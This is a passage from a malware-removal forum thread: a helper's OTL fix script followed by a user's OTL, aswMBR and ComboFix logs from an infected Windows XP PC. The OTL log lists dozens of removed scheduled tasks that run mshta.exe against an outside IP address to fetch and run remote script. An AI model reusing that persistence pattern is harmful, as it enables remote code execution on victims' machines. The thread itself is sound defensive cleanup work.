hklm\software\clients\startmenuinternet|command /rs
hklm\software\clients\startmenuinternet|command /64 /rs
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
CREATERESTOREPOINT

Run OTL

Paste (Ctrl + v) the copied text in the box where it says Custom Scan/Fixes

Select the All option in the Extra Registry group then Run Scan.

You should get two logs. Please copy and paste both of them.


Ron

#3
goodseed

    Member

  • Topic Starter
  • 49 posts
========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}\ not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\ deleted successfully.
C:\Program Files\Java\jre6\bin\ssv.dll moved successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\{CCC7A320-B3CA-4199-B1A6-9F516DD69829} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}\ not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\Locked deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6}\ not found.
Starting removal of ActiveX control {8AD9C840-044E-11D1-B3E9-00805F499D93}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\ not found.
Starting removal of ActiveX control {8FFBE65D-2C9C-4669-84BD-5829DC0B603C}
C:\WINDOWS\Downloaded Program Files\erma.inf moved successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\ not found.
Starting removal of ActiveX control {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}\ not found.
D:\AUTOEXEC.BAT moved successfully.
D:\Autorun.inf moved successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /run not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /run not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /action not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4b40609-7f44-11dc-a96c-00112f472345}\ not found.
File M:\Autorun.exe /uninstall not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\ deleted successfully.
D:\Info.exe moved successfully.
========== FILES ==========
< at /c >
Status ID Day Time Command Line
-------------------------------------------------------------------------------
Error 1 Each M T W Th F S Su 2:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 10 Each M T W Th F S Su 9:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 11 Each M T W Th F S Su 10:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 12 Each M T W Th F S Su 10:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 13 Each M T W Th F S Su 6:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 14 Each M T W Th F S Su 2:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 15 Each M T W Th F S Su 5:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 16 Each M T W Th F S Su 11:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 17 Each M T W Th F S Su 7:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 18 Each M T W Th F S Su 11:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 19 Each M T W Th F S Su 9:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 2 Each M T W Th F S Su 1:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 20 Each M T W Th F S Su 12:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 21 Each M T W Th F S Su 8:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 22 Each M T W Th F S Su 1:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 23 Each M T W Th F S Su 4:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 24 Each M T W Th F S Su 3:32 PM mshta.exe http://85.234.191.60...=27576717739727
Error 25 Each M T W Th F S Su 12:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 26 Each M T W Th F S Su 4:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 27 Each M T W Th F S Su 2:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 28 Each M T W Th F S Su 1:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 29 Each M T W Th F S Su 3:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 3 Each M T W Th F S Su 3:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 30 Each M T W Th F S Su 5:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 31 Each M T W Th F S Su 6:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 32 Each M T W Th F S Su 7:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 33 Each M T W Th F S Su 9:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 34 Each M T W Th F S Su 10:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 35 Each M T W Th F S Su 8:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 36 Each M T W Th F S Su 1:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 37 Each M T W Th F S Su 12:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 38 Each M T W Th F S Su 11:48 AM mshta.exe http://85.234.191.60...771219816766235
Error 39 Each M T W Th F S Su 2:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 4 Each M T W Th F S Su 4:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 40 Each M T W Th F S Su 5:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 41 Each M T W Th F S Su 3:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 42 Each M T W Th F S Su 6:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 43 Each M T W Th F S Su 10:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 44 Each M T W Th F S Su 4:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 45 Each M T W Th F S Su 11:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 46 Each M T W Th F S Su 7:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 47 Each M T W Th F S Su 8:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 48 Each M T W Th F S Su 9:48 PM mshta.exe http://85.234.191.60...771219816766235
Error 5 Each M T W Th F S Su 5:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 6 Each M T W Th F S Su 12:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 7 Each M T W Th F S Su 6:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 8 Each M T W Th F S Su 7:32 AM mshta.exe http://85.234.191.60...=27576717739727
Error 9 Each M T W Th F S Su 8:32 AM mshta.exe http://85.234.191.60...=27576717739727
C:\Documents and Settings\Owner\Desktop\cmd.bat deleted successfully.
C:\Documents and Settings\Owner\Desktop\cmd.txt deleted successfully.
C:\WINDOWS\tasks\At1.job moved successfully.
C:\WINDOWS\tasks\At10.job moved successfully.
C:\WINDOWS\tasks\At11.job moved successfully.
C:\WINDOWS\tasks\At12.job moved successfully.
C:\WINDOWS\tasks\At13.job moved successfully.
C:\WINDOWS\tasks\At14.job moved successfully.
C:\WINDOWS\tasks\At15.job moved successfully.
C:\WINDOWS\tasks\At16.job moved successfully.
C:\WINDOWS\tasks\At17.job moved successfully.
C:\WINDOWS\tasks\At18.job moved successfully.
File move failed. C:\WINDOWS\tasks\At19.job scheduled to be moved on reboot.
C:\WINDOWS\tasks\At2.job moved successfully.
C:\WINDOWS\tasks\At20.job moved successfully.
C:\WINDOWS\tasks\At21.job moved successfully.
C:\WINDOWS\tasks\At22.job moved successfully.
C:\WINDOWS\tasks\At23.job moved successfully.
C:\WINDOWS\tasks\At24.job moved successfully.
C:\WINDOWS\tasks\At25.job moved successfully.
C:\WINDOWS\tasks\At26.job moved successfully.
C:\WINDOWS\tasks\At27.job moved successfully.
C:\WINDOWS\tasks\At28.job moved successfully.
C:\WINDOWS\tasks\At29.job moved successfully.
C:\WINDOWS\tasks\At3.job moved successfully.
C:\WINDOWS\tasks\At30.job moved successfully.
C:\WINDOWS\tasks\At31.job moved successfully.
C:\WINDOWS\tasks\At32.job moved successfully.
C:\WINDOWS\tasks\At33.job moved successfully.
C:\WINDOWS\tasks\At34.job moved successfully.
C:\WINDOWS\tasks\At35.job moved successfully.
C:\WINDOWS\tasks\At36.job moved successfully.
C:\WINDOWS\tasks\At37.job moved successfully.
C:\WINDOWS\tasks\At38.job moved successfully.
C:\WINDOWS\tasks\At39.job moved successfully.
C:\WINDOWS\tasks\At4.job moved successfully.
C:\WINDOWS\tasks\At40.job moved successfully.
C:\WINDOWS\tasks\At41.job moved successfully.
C:\WINDOWS\tasks\At42.job moved successfully.
C:\WINDOWS\tasks\At43.job moved successfully.
C:\WINDOWS\tasks\At44.job moved successfully.
C:\WINDOWS\tasks\At45.job moved successfully.
C:\WINDOWS\tasks\At46.job moved successfully.
C:\WINDOWS\tasks\At47.job moved successfully.
C:\WINDOWS\tasks\At48.job moved successfully.
C:\WINDOWS\tasks\At5.job moved successfully.
C:\WINDOWS\tasks\At6.job moved successfully.
C:\WINDOWS\tasks\At7.job moved successfully.
C:\WINDOWS\tasks\At8.job moved successfully.
C:\WINDOWS\tasks\At9.job moved successfully.
========== COMMANDS ==========

[EMPTYFLASH]

User: Administrator

User: Administrator.YOUR-46E94OWX6A
->Flash cache emptied: 0 bytes

User: All Users

User: Default User
->Flash cache emptied: 0 bytes

User: LocalService
->Flash cache emptied: 0 bytes

User: NetworkService
->Flash cache emptied: 0 bytes

User: Owner
->Flash cache emptied: 876 bytes

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: Administrator

User: Administrator.YOUR-46E94OWX6A
->Java cache emptied: 0 bytes

User: All Users

User: Default User

User: LocalService
->Java cache emptied: 0 bytes

User: NetworkService
->Java cache emptied: 0 bytes

User: Owner
->Java cache emptied: 353632 bytes

Total Java Files Cleaned = 0.00 mb


OTL by OldTimer - Version 3.2.69.0 log created on 01182013_190910

Files\Folders moved on Reboot...
File\Folder C:\WINDOWS\tasks\At19.job not found!

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

#4
goodseed

aswMBR version 0.9.9.1707 Copyright© 2011 AVAST Software
Run date: 2013-01-18 19:31:00
-----------------------------
19:31:00.578 OS Version: Windows 5.1.2600 Service Pack 3
19:31:00.578 Number of processors: 2 586 0x304
19:31:00.578 ComputerName: YOUR-46E94OWX6A UserName: Owner
19:31:02.015 Initialize success
19:31:03.312 AVAST engine defs: 12121700
19:31:28.656 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP1T0L0-17
19:31:28.656 Disk 0 Vendor: MAXTOR_STM3160815AS 3.AAD Size: 152627MB BusType: 3
19:31:28.687 Disk 0 MBR read successfully
19:31:28.687 Disk 0 MBR scan
19:31:28.718 Disk 0 unknown MBR code
19:31:28.718 Disk 0 Partition 1 00 0B FAT32 RECOVERY 4975 MB offset 63
19:31:28.750 Disk 0 Partition 2 80 (A) 07 HPFS/NTFS NTFS 147641 MB offset 10190880
19:31:28.750 Disk 0 scanning sectors +312560640
19:31:28.812 Disk 0 scanning C:\WINDOWS\system32\drivers
19:31:43.359 Service scanning
19:31:57.765 Modules scanning
19:32:06.406 AVAST engine scan C:\WINDOWS
19:32:13.968 AVAST engine scan C:\WINDOWS\system32
19:34:44.890 AVAST engine scan C:\WINDOWS\system32\drivers
19:35:03.500 AVAST engine scan C:\Documents and Settings\Owner
19:39:45.218 AVAST engine scan C:\Documents and Settings\All Users
19:40:49.093 Scan finished successfully
19:46:28.109 Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Owner\Desktop\MBR.dat"
19:46:28.125 The log file has been saved successfully to "C:\Documents and Settings\Owner\Desktop\aswMBR.txt"

#5
goodseed

ComboFix 13-01-17.04 - Owner 01/18/2013 20:10:34.1.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.503.135 [GMT -6:00]
Running from: c:\documents and settings\Owner\Desktop\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\Administrator.YOUR-46E94OWX6A\WINDOWS
c:\documents and settings\All Users\Application Data\TEMP
c:\documents and settings\All Users\Application Data\TEMP\AVG\avi7.avg
c:\documents and settings\All Users\Application Data\TEMP\AVG\crt_x64.msi
c:\documents and settings\All Users\Application Data\TEMP\AVG\files.dat
c:\documents and settings\All Users\Application Data\TEMP\AVG\incavi.avm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_cz.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_da.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_fr.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ge.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_hu.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_id.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_in.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_it.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_jp.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ko.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ms.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_nl.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_pb.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_pl.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_pt.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_ru.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_sc.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_sk.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_sp.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_tr.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_us.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_zh.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\license_zt.htm
c:\documents and settings\All Users\Application Data\TEMP\AVG\microavi.avg
c:\documents and settings\All Users\Application Data\TEMP\AVG\miniavi.avg
c:\documents and settings\All Users\Application Data\TEMP\AVG\setup.dat
c:\documents and settings\All Users\Application Data\TEMP\AVG\setup.exe
c:\documents and settings\All Users\Application Data\TEMP\AVG\setup.ini
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupcz.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupda.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupfr.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupge.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuphu.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupid.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupin.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupit.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupjp.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupko.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupms.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupnl.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuppb.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuppl.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuppt.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupru.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupsc.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupsk.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupsp.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setuptr.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupus.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupzh.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\setupzt.lns
c:\documents and settings\All Users\Application Data\TEMP\AVG\trialkey.dat
c:\documents and settings\All Users\Application Data\TEMP\AVG\vcredis1.cab
c:\documents and settings\All Users\Application Data\TEMP\AVG\vcredist.msi
c:\documents and settings\Default User\WINDOWS
c:\documents and settings\Owner\Application Data\Adobe\AdobeUpdate .exe
c:\documents and settings\Owner\Application Data\Adobe\plugs
c:\documents and settings\Owner\Application Data\Ciiza
c:\documents and settings\Owner\Application Data\Ciiza\qoaqy.lyi
c:\documents and settings\Owner\Application Data\Ciiza\qoaqy.tmp
c:\documents and settings\Owner\My Documents\~WRL2274.tmp
c:\documents and settings\Owner\My Documents\DPE.DUS
c:\documents and settings\Owner\WINDOWS
C:\Microsoft
c:\windows\system32\config\systemprofile\WINDOWS
c:\windows\system32\ps2.bat
c:\windows\system32\URTTemp
c:\windows\system32\URTTemp\fusion.dll
c:\windows\system32\URTTemp\mscoree.dll
c:\windows\system32\URTTemp\mscoree.dll.local
c:\windows\system32\URTTemp\mscorsn.dll
c:\windows\system32\URTTemp\mscorwks.dll
c:\windows\system32\URTTemp\msvcr71.dll
c:\windows\system32\URTTemp\regtlib.exe
c:\windows\Tasks\Ap19.job
.
.
((((((((((((((((((((((((( Files Created from 2012-12-19 to 2013-01-19 )))))))))))))))))))))))))))))))
.
.
2013-01-19 01:09 . 2013-01-19 01:09 -------- d-----w- C:\_OTL
2013-01-16 02:33 . 2013-01-16 02:40 -------- d-----w- C:\TDSSKiller_Quarantine
2013-01-15 01:26 . 2012-10-30 23:51 21256 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys
2013-01-15 01:26 . 2012-10-30 23:51 361032 ----a-w- c:\windows\system32\drivers\aswSP.sys
2013-01-15 01:25 . 2012-10-30 23:51 35928 ----a-w- c:\windows\system32\drivers\aswRdr.sys
2013-01-15 01:25 . 2012-10-30 23:51 54232 ----a-w- c:\windows\system32\drivers\aswTdi.sys
2013-01-15 01:25 . 2012-10-30 23:51 738504 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2013-01-15 01:25 . 2012-10-30 23:51 97608 ----a-w- c:\windows\system32\drivers\aswmon2.sys
2013-01-15 01:25 . 2012-10-30 23:51 89752 ----a-w- c:\windows\system32\drivers\aswmon.sys
2013-01-15 01:25 . 2012-10-30 23:51 25256 ----a-w- c:\windows\system32\drivers\aavmker4.sys
2013-01-15 01:23 . 2012-10-30 23:51 41224 ----a-w- c:\windows\avastSS.scr
2013-01-15 01:23 . 2012-10-30 23:50 227648 ----a-w- c:\windows\system32\aswBoot.exe
2013-01-15 01:21 . 2013-01-15 01:21 -------- d-----w- c:\program files\AVAST Software
2013-01-15 01:21 . 2013-01-15 01:21 -------- d-----w- c:\documents and settings\All Users\Application Data\AVAST Software
2013-01-14 20:12 . 2013-01-14 20:12 -------- d-----w- c:\documents and settings\Owner\Application Data\SUPERAntiSpyware.com
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-12-16 12:23 . 2007-10-13 12:05 290560 ----a-w- c:\windows\system32\atmfd.dll
2012-12-14 22:49 . 2010-10-26 03:58 21104 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-11-13 01:25 . 2004-05-12 06:16 1866368 ----a-w- c:\windows\system32\win32k.sys
2012-11-06 02:01 . 2007-05-15 20:43 1371648 ----a-w- c:\windows\system32\msxml6.dll
2012-11-02 02:02 . 2002-12-12 14:14 375296 ----a-w- c:\windows\system32\dpnet.dll
2012-11-01 12:17 . 2007-10-13 12:07 43520 ----a-w- c:\windows\system32\licmgr10.dll
2012-11-01 12:17 . 2007-10-13 12:06 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
2012-11-01 12:17 . 2004-01-22 06:16 916992 ----a-w- c:\windows\system32\wininet.dll
2012-11-01 00:35 . 2007-10-13 22:07 385024 ----a-w- c:\windows\system32\html.iec
2013-01-11 03:17 . 2013-01-11 03:14 262704 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2012-10-30 23:50 121528 ----a-w- c:\program files\AVAST Software\Avast\ashShell.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SUPERAntiSpyware"="c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe" [2012-11-01 4763008]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"hpsysdrv"="c:\windows\system\hpsysdrv.exe" [1998-05-07 52736]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 88363]
"Logitech Utility"="Logi_MwX.Exe" [2003-11-07 19968]
"KBD"="c:\hp\KBD\KBD.EXE" [2005-02-02 61440]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-09-23 35760]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-12-03 946352]
"QuickTime Task"="c:\program files\QuickTime\qttask.exe" [2008-11-04 413696]
"HPDJ Taskbar Utility"="c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" [2003-03-09 188416]
"Windstream_BCUC_McciTrayApp"="c:\program files\Windstream_BCUC\McciTrayApp.exe" [2010-05-01 1742336]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"avast"="c:\program files\AVAST Software\Avast\avastUI.exe" [2012-10-30 4297136]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="c:\progra~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" [2007-03-23 39264]
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
